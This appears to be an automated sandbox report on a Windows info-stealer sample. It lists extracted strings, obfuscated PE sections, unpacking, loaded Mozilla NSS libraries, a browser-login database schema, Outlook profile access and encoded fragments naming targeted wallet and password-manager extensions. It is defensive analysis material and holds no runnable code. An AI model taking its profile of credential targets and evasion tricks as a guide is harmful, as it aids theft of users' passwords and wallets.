Source: file.exe, 00000006.00000002.1559362225.0000000029D84000.00000004.00000020.00020000.00000000.sdmp, IDBGHDGHCGHCAAKFIIEC.6.dr String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: file.exe, 00000006.00000002.1559362225.0000000029D84000.00000004.00000020.00020000.00000000.sdmp, IDBGHDGHCGHCAAKFIIEC.6.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000006.00000003.1407452315.00000000019F9000.00000004.00000020.00020000.00000000.sdmp, HCAEGCBF.6.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000006.00000003.1407452315.00000000019F9000.00000004.00000020.00020000.00000000.sdmp, HCAEGCBF.6.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000006.00000003.1407452315.00000000019F9000.00000004.00000020.00020000.00000000.sdmp, HCAEGCBF.6.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: IDBGHDGHCGHCAAKFIIEC.6.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbW4pDk4pbW4CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: https://mozilla.org0/
Source: DGDAEHCBGIIJJJJKKKEHDGHJKF.6.dr String found in binary or memory: https://support.mozilla.org
Source: DGDAEHCBGIIJJJJKKKEHDGHJKF.6.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: DGDAEHCBGIIJJJJKKKEHDGHJKF.6.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.Qb0WswhkLhoa
Source: file.exe, 00000006.00000002.1559362225.0000000029D84000.00000004.00000020.00020000.00000000.sdmp, IDBGHDGHCGHCAAKFIIEC.6.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_f6f292994d7c60be109e4c185cbc03032d36d17160d4e639
Source: mozglue[1].dll.6.dr, mozglue.dll.6.dr, nss3[1].dll.6.dr, freebl3.dll.6.dr, softokn3.dll.6.dr, softokn3[1].dll.6.dr, freebl3[1].dll.6.dr, nss3.dll.6.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000006.00000003.1407452315.00000000019F9000.00000004.00000020.00020000.00000000.sdmp, HCAEGCBF.6.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000006.00000003.1407452315.00000000019F9000.00000004.00000020.00020000.00000000.sdmp, HCAEGCBF.6.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000006.00000002.1559362225.0000000029D84000.00000004.00000020.00020000.00000000.sdmp, IDBGHDGHCGHCAAKFIIEC.6.dr String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: DGDAEHCBGIIJJJJKKKEHDGHJKF.6.dr String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000006.00000002.1537629234.0000000000DEA000.00000040.00000001.01000000.00000004.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: DGDAEHCBGIIJJJJKKKEHDGHJKF.6.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.8Z86fTxZfkM6
Source: file.exe, 00000006.00000002.1537629234.0000000000DEA000.00000040.00000001.01000000.00000004.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: DGDAEHCBGIIJJJJKKKEHDGHJKF.6.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.UnUp0v0CLe9Y
Source: file.exe, 00000006.00000002.1537629234.0000000000DEA000.00000040.00000001.01000000.00000004.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000006.00000003.1492948009.000000002FF34000.00000004.00000020.00020000.00000000.sdmp, DGDAEHCBGIIJJJJKKKEHDGHJKF.6.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000006.00000002.1537629234.0000000000DEA000.00000040.00000001.01000000.00000004.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000006.00000002.1537629234.0000000000DEA000.00000040.00000001.01000000.00000004.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: DGDAEHCBGIIJJJJKKKEHDGHJKF.6.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000006.00000002.1537629234.0000000000DEA000.00000040.00000001.01000000.00000004.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000006.00000003.1492948009.000000002FF34000.00000004.00000020.00020000.00000000.sdmp, DGDAEHCBGIIJJJJKKKEHDGHJKF.6.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

System Summary
barindex
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5CB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 6_2_6C5CB700
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5CB8C0 rand_s,NtQueryVirtualMemory, 6_2_6C5CB8C0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5CB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 6_2_6C5CB910
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C56F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 6_2_6C56F280
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F 6_2_0115193F
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0117D921 6_2_0117D921
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115B957 6_2_0115B957
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115D36A 6_2_0115D36A
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_011533D2 6_2_011533D2
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0114E3E9 6_2_0114E3E9
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_011582CE 6_2_011582CE
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_01159D54 6_2_01159D54
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_01063409 6_2_01063409
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_01156799 6_2_01156799
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0110D637 6_2_0110D637
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_010C9664 6_2_010C9664
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0114FE7A 6_2_0114FE7A
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_010D1EE4 6_2_010D1EE4
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_011556E2 6_2_011556E2
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5635A0 6_2_6C5635A0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5D545C 6_2_6C5D545C
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C575440 6_2_6C575440
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5A5C10 6_2_6C5A5C10
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5B2C10 6_2_6C5B2C10
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5DAC00 6_2_6C5DAC00
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5D542B 6_2_6C5D542B
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C58D4D0 6_2_6C58D4D0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5764C0 6_2_6C5764C0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5A6CF0 6_2_6C5A6CF0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C56D4E0 6_2_6C56D4E0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C576C80 6_2_6C576C80
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5C34A0 6_2_6C5C34A0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5CC4A0 6_2_6C5CC4A0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C58ED10 6_2_6C58ED10
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C590512 6_2_6C590512
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C57FD00 6_2_6C57FD00
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5A0DD0 6_2_6C5A0DD0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5C85F0 6_2_6C5C85F0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C589E50 6_2_6C589E50
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5A3E50 6_2_6C5A3E50
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5B2E4E 6_2_6C5B2E4E
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C584640 6_2_6C584640
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C56C670 6_2_6C56C670
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5D6E63 6_2_6C5D6E63
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5A7E10 6_2_6C5A7E10
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5B5600 6_2_6C5B5600
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5C9E30 6_2_6C5C9E30
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C56BEF0 6_2_6C56BEF0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C57FEF0 6_2_6C57FEF0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5D76E3 6_2_6C5D76E3
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C585E90 6_2_6C585E90
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5CE680 6_2_6C5CE680
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5C4EA0 6_2_6C5C4EA0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5A7710 6_2_6C5A7710
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C579F00 6_2_6C579F00
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C596FF0 6_2_6C596FF0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C56DFE0 6_2_6C56DFE0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5B77A0 6_2_6C5B77A0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C588850 6_2_6C588850
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C58D850 6_2_6C58D850
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5AF070 6_2_6C5AF070
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C577810 6_2_6C577810
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5AB820 6_2_6C5AB820
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5B4820 6_2_6C5B4820
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5D50C7 6_2_6C5D50C7
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C58C0E0 6_2_6C58C0E0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5A58E0 6_2_6C5A58E0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5960A0 6_2_6C5960A0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C58A940 6_2_6C58A940
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5BB970 6_2_6C5BB970
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5DB170 6_2_6C5DB170
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C57D960 6_2_6C57D960
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5A5190 6_2_6C5A5190
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5C2990 6_2_6C5C2990
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C59D9B0 6_2_6C59D9B0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C56C9A0 6_2_6C56C9A0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5A9A60 6_2_6C5A9A60
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5A8AC0 6_2_6C5A8AC0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C581AF0 6_2_6C581AF0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5AE2F0 6_2_6C5AE2F0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5DBA90 6_2_6C5DBA90
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C57CAB0 6_2_6C57CAB0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5D2AB0 6_2_6C5D2AB0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5622A0 6_2_6C5622A0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C594AA0 6_2_6C594AA0
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C565340 6_2_6C565340
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C57C370 6_2_6C57C370
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5AD320 6_2_6C5AD320
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5D53C8 6_2_6C5D53C8
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C56F380 6_2_6C56F380
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C59CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00D945C0 appears 316 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C5A94D0 appears 90 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000006.00000002.1565711780.000000006C7E5000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000006.00000002.1565444356.000000006C5F2000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: mscidksm ZLIB complexity 0.9949102734614207
Source: file.exe, 00000006.00000003.1311274897.00000000056A0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000006.00000002.1537629234.0000000000D91000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/23@0/1
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_6C5C7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 6_2_6C5C7030
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00DA8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 6_2_00DA8680
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00DA3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 6_2_00DA3720
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\LDFCGSAQ.htm Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3.dll.6.dr, softokn3[1].dll.6.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000006.00000002.1550143924.000000001DDE4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1565615582.000000006C79F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000006.00000002.1565194405.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.6.dr, nss3.dll.6.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.6.dr, softokn3[1].dll.6.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000006.00000002.1550143924.000000001DDE4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1565615582.000000006C79F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000006.00000002.1565194405.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.6.dr, nss3.dll.6.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000006.00000002.1550143924.000000001DDE4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1565615582.000000006C79F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000006.00000002.1565194405.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.6.dr, nss3.dll.6.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000006.00000002.1550143924.000000001DDE4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1565615582.000000006C79F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000006.00000002.1565194405.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.6.dr, nss3.dll.6.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.6.dr, softokn3[1].dll.6.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.6.dr, softokn3[1].dll.6.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.6.dr, softokn3[1].dll.6.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.6.dr, softokn3[1].dll.6.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.6.dr, softokn3[1].dll.6.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000006.00000002.1550143924.000000001DDE4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1565615582.000000006C79F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000006.00000002.1565194405.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.6.dr, nss3.dll.6.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000006.00000002.1550143924.000000001DDE4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1565194405.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000006.00000002.1550143924.000000001DDE4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1565615582.000000006C79F000.00000002.00000001.01000000.00000007.sdmp, file.exe, 00000006.00000002.1565194405.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.6.dr, nss3.dll.6.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3.dll.6.dr, softokn3[1].dll.6.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000006.00000003.1422954664.000000001DCFF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000003.1405751936.000000001DCE4000.00000004.00000020.00020000.00000000.sdmp, HIIEBAFCBKFIDGCAKKKF.6.dr, AFHDGDGIIDGCFIDHDHDH.6.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000006.00000002.1550143924.000000001DDE4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1565194405.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3.dll.6.dr, softokn3[1].dll.6.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000006.00000002.1550143924.000000001DDE4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000006.00000002.1565194405.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3.dll.6.dr, softokn3[1].dll.6.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: file.exe ReversingLabs: Detection: 47%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 1828864 > 1048576
Source: file.exe Static PE information: Raw size of mscidksm is bigger than: 0x100000 < 0x198400
Source: Binary string: mozglue.pdbP source: file.exe, 00000006.00000002.1565403351.000000006C5DD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.6.dr, mozglue.dll.6.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.6.dr, freebl3[1].dll.6.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.6.dr, freebl3[1].dll.6.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000006.00000002.1565615582.000000006C79F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.6.dr, nss3.dll.6.dr
Source: Binary string: softokn3.pdb@ source: softokn3.dll.6.dr, softokn3[1].dll.6.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.6.dr, vcruntime140[1].dll.6.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.6.dr, msvcp140.dll.6.dr
Source: Binary string: nss3.pdb source: file.exe, 00000006.00000002.1565615582.000000006C79F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.6.dr, nss3.dll.6.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000006.00000002.1565403351.000000006C5DD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.6.dr, mozglue.dll.6.dr
Source: Binary string: softokn3.pdb source: softokn3.dll.6.dr, softokn3[1].dll.6.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 6.2.file.exe.d90000.0.unpack :EW;.rsrc :W;.idata :W; :EW;mscidksm:EW;ferwzipo:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;mscidksm:EW;ferwzipo:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_00DA9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 6_2_00DA9860
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x1c7961 should be: 0x1caa93
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: mscidksm
Source: file.exe Static PE information: section name: ferwzipo
Source: file.exe Static PE information: section name: .taggant
Source: mozglue.dll.6.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.6.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.6.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.6.dr Static PE information: section name: .didat
Source: nss3.dll.6.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.6.dr Static PE information: section name: .00cfg
Source: softokn3.dll.6.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.6.dr Static PE information: section name: .00cfg
Source: freebl3.dll.6.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.6.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_01228924 push ebx; mov dword ptr [esp], eax 6_2_0122893C
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_01228924 push 6FD591D2h; mov dword ptr [esp], edx 6_2_012289EA
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0124992F push 370ACD6Fh; mov dword ptr [esp], esi 6_2_01249A2E
Source: C:\Users\user\Desktop\file.exe Code function: 6_2_0115193F push edi; mov dword ptr [esp], edx 6_2_011519F5
